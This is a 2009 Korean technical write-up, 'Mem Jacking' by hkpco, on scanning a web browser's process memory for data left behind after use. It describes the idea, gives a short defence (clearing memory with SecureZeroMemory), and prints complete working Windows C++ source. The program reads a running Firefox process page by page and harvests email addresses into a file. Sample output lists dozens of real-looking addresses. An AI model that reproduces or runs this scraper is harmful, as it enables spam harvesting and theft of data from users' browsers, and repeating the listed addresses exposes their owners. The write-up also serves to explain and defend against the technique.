===========================================
<< Mem Jacking >>
by hkpco(박찬암)
-------------------------------
mail - chanam.park@hkpco.kr
homepage - http://hkpco.kr/
date - 2009. 1. 24
-------------------------------
===========================================

1. 서론

얼마전 milw0rm에서 "Mem - Jacking"( http://milw0rm.com/papers/274 ) 이라는 글을 보았다. 작성자가 이러한 기술명을 택한 이유는 기존에 불리우는 Session-Hijacking, Click-Jacking과 같은 기술들 처럼 악의적인 의도로 메모리를 가로챈다는 의미로 Mem-Jacking 이라고 부르게 되었다고 생각하면 될 것 같다. 본 문서에서는 Mem-Jacking에 대한 간략한 설명, 방어책과 함께 그에 대한 기술 증명 코드를 포함하고 있다.

2. 요약 설명

웹 브라우저는 컴퓨터를 사용함에 있어 빠질 수 없는 필수적인 프로그램이다. 나는 어릴적 '인터넷' 이라고 하면 웹 브라우저를 떠올릴 만큼 그 이미지가 직결되어 있었으며, 범위를 넓혀 오늘날 인터넷을 이용하는 사람들에게 웹 브라우저의 유용함과 이루 말할 수 없는 장점들이 안겨준 편의성은 한두가지가 아닐 것이다. 그렇다면 이 웹 브라우저를 거치는 데이터들은 어떠한 것이 있을까? 사용자 아이디와 패스워드부터 시작해서 메일 주소, URL 기록, 검색 키워드 등 정말 다양한 정보들이 웹 브라우저, 더 정확히 말하면 웹 브라우저의 메모리를 거칠 것이다. 물론 중요 정보는 암호화 되어 관리되기 때문에 안전하다고 한다. 하지만, 해당 데이터의 사용을 위해서는 어쩔 수 없이 평문 획득을 위하여 복호화를 거쳐야 하는 경우도 있을 수 있기 마련이며 이 과정은 당연히 메모리가 이용된다. 그런데 많은 어플리케이션들은 이런식으로 사용 된 메모리를 깨끗하게 초기화 하는 경우가 드물다. 이런 경우 다른 데이터로 덮어 씌우거나 사용한 메모리를 해제한다고 해도 중요 데이터가 남아있을 수 있다. Mem-Jacking은 이러한 문제점을 이용한 것이다. 다시 한 번 간단히 정리하면, 웹 브라우저의 메모리를 거치는 중요한 정보들이 많음에도 불구하고 이러한 데이터의 사용 이후에도 메모리 클린업을 하지 않기 때문에 다양한 데이터가 그대로 남아있게 된다. 이를 이용해서 웹 브라우저의 실행 도중에 메모리 스캔을 통하여 중요 정보들을 수집하는 기술이다.
그런데 사실 메모리를 긁어내는 기술은 운영체제를 막론하고 오래전부터 존재했으며 다만 그 활용에 차이가 있었을 뿐 전혀 새로운 것이 아니다. 아무튼, milw0rm에 공개된 문서에서는 이를 스패머의 입장에서 다량의 메일 주소 수집에 이용하는 악의적인 예를 들었는데 실제로 해당 기술을 응용한 악성코드를 제작한다면 수천, 수만개의 메일 주소 수집은 그리 어려운 일도 아니라는 생각이 든다.

3. 실제 적용

실행 중인 파이어폭스(FireFox)의 메모리를 스캔하여 .com, .net, .org 도메인을 포함하는 메일 주소를 추출하는 프로그램을 통해 테스트해 보자. 중복되는 데이터도 있겠지만 단지 기술의 확인만 하면되므로 그 부분에 대한 처리는 고려하지 않았다.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// mem jacking 프로그램 실행
C:\>mem_jacking.exe
[Mem Jacking] Working
[Mem Jacking] Result in C:\mjres.txt
[Mem Jacking] 193 Found
[Mem Jacking] Completed

// 결과 파일 확인
C:\>type mjres.txt
jqs@sun.com
mano@mozilla.com
ehsan.akhgari@gmail.com
contact@cusser.net
contact@cusser.net
mano@mozilla.com
ehsan.akhgari@gmail.com
hyatt@netscape.com
mconnor@steelgryphon.com
.
.
sspitzer@mozilla.org
zeniko@gmail.com
doronr@us.ibm.com
zeniko@gmail.com
hewitt@netscape.com
zeniko@gmail.com
surkov.alexander@gmail.com
.
.
hanjw2@nate.com
caliphos@naver.com
hkpco@korea.com
vortex8539@hanmail.net
vortex8539@hanmail.net
11210210@hanmail.net
caliphos@naver.com
.
.
11210210@hanmail.net
caliphos@naver.com
hkpco@korea.com
vortex8539@hanmail.net
seaofchaos@inhaian.net
caliphos@naver.com
freemail@thawte.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

총 193개의 메일 주소를 찾았으며 결과는 C:\mjres.txt 파일에 저장된 것을 볼 수 있다. 중복되는 메일 주소도 많지만 필요하다면 이는 조금만 코드 수정을 거치면(필요한 사람이 없기를 바란다) 해결할 수 있다.

4. 방어책

다양한 방어책을 생각해 볼 수 있겠지만 근본적으로 특정 메모리의 사용이 더이상 필요하지 않을 경우 가능한 빨리 해당 메모리를 초기화 시켜주는 방법이 가장 확실할 것이다. 단, 해제 직전의 일반 memset() 호출은 컴파일러가 불필요한 쓰기로 판단하여 제거할 수 있으므로 SecureZeroMemory()처럼 최적화 대상에서 제외되는 함수를 사용해야 하며, 이 방법은 같은 사용자 권한의 프로세스가 PROCESS_VM_READ 권한으로 메모리를 읽는 행위 자체를 막는 것이 아니라 읽힐 수 있는 잔존 데이터의 양과 시간을 줄이는 것임을 염두에 두어야 한다.

5.
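소스 코드

단지 기술적 증명을 위한 코드이기 때문에 속도, 간결함 등에 크게 신경쓰지 않았으며 코드 또한 마음에 들지 않지만 Proof Of Concept이라는 미명하에 그대로 남겨둔다. 참고로 milw0rm에 공개된 문서에서는 MASM을 이용하여 브라우저의 메모리에 .com이 포함된 모든 문자열을 추출하는 코드를 보여주었는데 결과가 별로 크게 와닿지 않아서 새로 작성해 본 것이다.

- Mem_Jacking.cpp -

/*
   Collecting E-mail address using by Mem Jacking
   by hkpco( chanam.park@hkpco.kr )
   http://hkpco.kr/
*/
// Comment> I know, this code is very dirty. but I coded for proof of technique.

// NOTE(review): the header names were lost in extraction (three bare "#include"
// lines). Restored from the APIs the code uses: Win32 (HANDLE, FindWindow,
// OpenProcess, ReadProcessMemory, CreateFile/WriteFile), the TCHAR helpers
// (_tmain, _T, _tprintf) and the C string functions (strlen, strchr, memcmp).
// Windows-only; builds with MSVC.
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <string.h>

#define BEGIN_ADDR 0x1000
#define END_ADDR   0x70000000
#define PAGE_SZ    0x1000
#define FILE_NAME  "C:\\mjres.txt"
// Characters accepted when walking backwards from a matched suffix to find the
// start of a candidate address ('@' included so the local part is collected too).
#define Valid "0123456789_.abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@"

HANDLE hFile;
// Domain suffixes that mark the end of a candidate address. The array is
// NULL-terminated so the lookup loop in find_tail() has a stop condition — the
// original had no sentinel and `while( Tail[++i] )` read past the end of it.
const char *Tail[] = { ".com", ".org", ".net", NULL };
int get_num = 0;

bool find_tail( char *pbuf, size_t size ); // Scan one page for addresses ending in a Tail[] suffix
char *hk_strfnd( const char *str, const char *x, const size_t sz ); // Length-bounded strstr (raw memory contains '\0' bytes)

// Entry point: find the running Firefox window, open its process for reading,
// walk the user address space one page at a time and hand every readable page
// to find_tail(). Results are appended to FILE_NAME.
// Returns 0 on completion, -1 if the window, the process or the output file
// cannot be opened.
int _tmain( void )
{
    HWND hwnd;
    HANDLE ph_fox;
    DWORD pid;
    SIZE_T rNum;                      // ReadProcessMemory reports SIZE_T, not DWORD
    ULONG_PTR addr;
    char buff[PAGE_SZ + 1] = {0x00,};

    hwnd = FindWindow( _T("MozillaUIWindowClass"), NULL );
    if( hwnd == NULL ) {
        _tprintf( _T("FindWindow() error\n") );
        return -1;
    }
    GetWindowThreadProcessId( hwnd, &pid );

    // PROCESS_VM_READ is all ReadProcessMemory needs. Nothing is spawned with this
    // handle, so it must not be marked inheritable (the original passed TRUE).
    ph_fox = OpenProcess( PROCESS_VM_READ, FALSE, pid );
    if( ph_fox == NULL ) {
        _tprintf( _T("OpenProcess() error\n") );
        return -1;
    }

    hFile = CreateFile( _T(FILE_NAME), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL );
    if( hFile == INVALID_HANDLE_VALUE ) {
        _tprintf( _T("CreateFile() error\n") );
        CloseHandle(ph_fox);
        return -1;
    }

    _tprintf( _T("[Mem Jacking] Working\n") );
    _tprintf( _T("[Mem Jacking] Result in %s\n"), _T(FILE_NAME) );

    // Blind page walk: unmapped pages fail to read and are skipped.
    // (VirtualQueryEx would avoid the failed reads; kept simple for the PoC.)
    for( addr = BEGIN_ADDR ; addr < END_ADDR ; addr += PAGE_SZ ) {
        rNum = 0;
        // The original ignored the result, so a failed read left the previous
        // page in buff and it was scanned again — one source of the duplicates
        // in the sample output. Only the bytes actually read are scanned.
        if( !ReadProcessMemory( ph_fox, (LPCVOID)addr, buff, PAGE_SZ, &rNum ) || rNum == 0 )
            continue;
        buff[rNum] = '\0';
        find_tail( buff, (size_t)rNum );
    }

    CloseHandle(ph_fox);
    CloseHandle(hFile);

    _tprintf( _T("[Mem Jacking] %d Found\n"), get_num );
    _tprintf( _T("[Mem Jacking] Completed\n") );
    return 0;
}

// True if c may be part of a candidate address (c is in Valid). The explicit NUL
// check matters: strchr( Valid, '\0' ) would otherwise "find" the terminator and
// let the backward walk run across zero bytes.
static bool is_addr_char( char c )
{
    return c != '\0' && strchr( Valid, c ) != NULL;
}

// Scan size bytes at pbuf for every suffix in Tail[]. For each hit, walk backwards
// over Valid characters to find the start of the candidate; if that run contains an
// '@' that is not its first character, write "<candidate>\r\n" to hFile and count it.
//
// Differences from the original PoC, all behaviour fixes:
//  - the backward walk stops at pbuf (the original walked below the buffer when the
//    run reached the start of the page);
//  - the search resumes after each hit in a loop instead of recursing (the recursion
//    passed the offset instead of the remaining length and allocated a 4 KiB stack
//    buffer per level, so a page dense in ".com" could exhaust the stack);
//  - each suffix is searched over the page once, so a region is not reported again
//    by the outer loop after the recursion already covered it.
// A candidate that straddles a page boundary is still truncated or missed; that is
// inherent to scanning one page at a time. Identical strings living at several
// places in memory are still reported once per copy.
// Always returns true; the bool return is kept for the original signature.
bool find_tail( char *pbuf, size_t size )
{
    int i;
    const char *cur, *hit, *start;
    size_t tail_len, remain;
    DWORD num;

    for( i = 0 ; Tail[i] != NULL ; i++ ) {
        tail_len = strlen( Tail[i] );
        cur = pbuf;
        remain = size;

        while( (hit = hk_strfnd( cur, Tail[i], remain )) != NULL ) {
            bool mailornot = false;

            // Walk back from the byte before the suffix while it is a Valid char,
            // never stepping before the start of the buffer.
            start = hit;
            while( start > pbuf && is_addr_char( *(start - 1) ) ) {
                start--;
                if( *start == '@' )
                    mailornot = true;
            }

            // Filtering if there is no account (ex - "@google.com", "@korea.com" strings)
            if( *start == '@' )
                mailornot = false;

            // start < hit: at least one Valid char precedes the suffix
            if( start < hit && mailornot ) {
                WriteFile( hFile, start, (DWORD)((hit + tail_len) - start), &num, NULL );
                WriteFile( hFile, "\r\n", 2, &num, NULL );
                FlushFileBuffers(hFile);
                get_num++;
            }

            // Resume right after this suffix.
            cur = hit + tail_len;
            remain = size - (size_t)(cur - pbuf);
        }
    }
    return true;
}

// Bounded substring search: pointer to the first occurrence of x within the first
// sz bytes of str, or NULL. Unlike strstr it does not stop at '\0', which matters
// because the scanned pages are raw memory. An empty x matches at str, as before.
char *hk_strfnd( const char *str, const char *x, const size_t sz )
{
    size_t xlen = strlen( x );
    size_t pos;

    if( xlen == 0 )
        return (char *)str;

    // Guard the loop bound: with sz < strlen(x) the original's unsigned
    // `sz - strlen(x) + 1` wrapped around and the loop read off the buffer.
    if( sz < xlen )
        return NULL;

    for( pos = 0 ; pos + xlen <= sz ; pos++ ) {
        if( memcmp( str + pos, x, xlen ) == 0 )
            return (char *)(str + pos);
    }
    return NULL;
}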